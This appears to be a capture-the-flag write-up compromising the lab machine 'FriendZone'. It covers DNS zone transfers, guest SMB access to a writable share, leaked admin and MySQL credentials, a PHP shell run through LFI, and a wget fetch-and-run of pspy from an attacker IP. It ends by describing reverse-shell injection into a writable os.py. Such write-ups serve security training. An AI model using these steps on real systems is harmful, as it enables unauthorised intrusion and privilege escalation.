Vulnerability Explanation: The machine is misconfigured on Share which could allow us connect without password and write permission allow us to upload reverse shell. The application is vulnerable to LFI which could allow us to execute our payload and gain access on machine.
Privilege Escalation Vulnerability: Misconfigure of Privilege user
Vulnerability Fix: Restrict guess user and allow only authorizer user to access and Least Privilege
Severity: High
Step to Compromise the Host:
Reconnaissance
└─$ nmap -p- -sC -sV -T4 10.10.10.123 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-15 11:00 EST
Nmap scan report for 10.10.10.123
Host is up (0.046s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2021-11-15T18:01:33+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-15T16:01:33
|_ start_date: N/A
Enumeration
Port 80 Apache/2.4.29
First thing first, I will go through webpage first. It just displays a webpage and view the source code we found email with the domain name friendzoneportal.red.
Let use gobuster to find hidden directory. We didn't see any interesting there.
Nothing is there. It just displays a web page show Not Found.
Port 53 domain
As we found there domain name friendzoneportal.red on the webpage and friendzone.red on nmap scan, let enumerate the DNS with zone transfer whether we can find more sub domain.
We can enumerate the zone transfer with host and dig command.
└─$ host -l friendzone.red 10.10.10.123 1 ⨯
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
└─$ host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
└─$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.16.15-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 48 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 15 11:17:33 EST 2021
;; XFR size: 8 records (messages 1, bytes 289)
└─$ dig axfr friendzoneportal.red @10.10.10.123
; <<>> DiG 9.16.15-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 48 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 15 11:17:46 EST 2021
;; XFR size: 9 records (messages 1, bytes 309)
To view easily, let summary all the subdomain that we have found and add all of them in our hosts.
We need to get back to access all of those subdomains via webpage. We can check on HTTPS because on HTTP, it will return the same web page.
Let just briefly what we found below,
1/ admin.friendzoneportal.red and administrator1.friendzone.red are login page.
2/ uploads.friendzone.red file upload.
3/ friendzone.red/js/js interesting to check out.
Port 139, 445 Samba
Let check the permission on the shares drive, as it allows guess login and have Read, Write permission on Development folder.
└─$ smbmap -H 10.10.10.123
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
As we can see, there is a creds.txt file stored under /general folder.
└─$ smbmap -R -H 10.10.10.123 1 ⨯
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
.\general\*
dr--r--r-- 0 Wed Jan 16 15:10:51 2019 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
fr--r--r-- 57 Tue Oct 9 19:52:42 2018 creds.txt
Development READ, WRITE FriendZone Samba Server Files
.\Development\*
dr--r--r-- 0 Mon Nov 15 11:46:07 2021 .
dr--r--r-- 0 Wed Jan 23 16:51:02 2019 ..
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
-R options for Recursively list dirs, and files
Let connect and download the creds.txt file from /general folder.
└─$ smbclient //10.10.10.123/general
Enter WORKGROUP\pwned's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 16 15:10:51 2019
.. D 0 Wed Jan 23 16:51:02 2019
creds.txt N 57 Tue Oct 9 19:52:42 2018
9221460 blocks of size 1024. 6438992 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec
└─$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Let login with the credential we found. It's working on administrator1.friendzone.red.
Exploitation
LFI
Let upload a simple php file for testing if it works.
└─$ smbclient //10.10.10.123/Development -N 1 ⚙
Try "help" to get a list of possible commands.
smb: \> put test.php
putting file test.php as \test.php (0.2 kb/s) (average 0.2 kb/s)
If we mention test.php, it doesn't display the text. If we mention only test, it will work.
└─$ smbclient //10.10.10.123/Development -N 1 ⚙
Try "help" to get a list of possible commands.
smb: \> put shell.php
putting file shell.php as \shell.php (0.3 kb/s) (average 0.3 kb/s)
smb: \> dir
. D 0 Fri Nov 19 09:37:59 2021
.. D 0 Wed Jan 23 16:51:02 2019
test.php A 26 Fri Nov 19 09:20:23 2021
shell.php A 35 Fri Nov 19 09:37:59 2021
9221460 blocks of size 1024. 6460328 blocks available
on the machine, we found mysql_data.conf stored credentials.
www-data@FriendZone:/var/www$ ls
admin friendzoneportal html uploads
friendzone friendzoneportaladmin mysql_data.conf
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
www-data@FriendZone:/var/www$ su friend
Password:
friend@FriendZone:/var/www$ whoami
friend
friend@FriendZone:/var/www$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
Priv-Esc to root
Auto script python
let start our HTTP server to share file pspy for process enumerate.
python -m SimpleHTTPServer 80
wget 10.10.14.31/pspy32
chmod +x pspy32
./pspy32
After waiting for sometimes, we found that file reporter.py running as schedule.
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
As the python script will import os module, there is misconfigure of privilege user on os.py.
We can download script os.py from our victim machine and inject python reverse shell at the end of the script, then paste it back to our victim to replace the existing file.
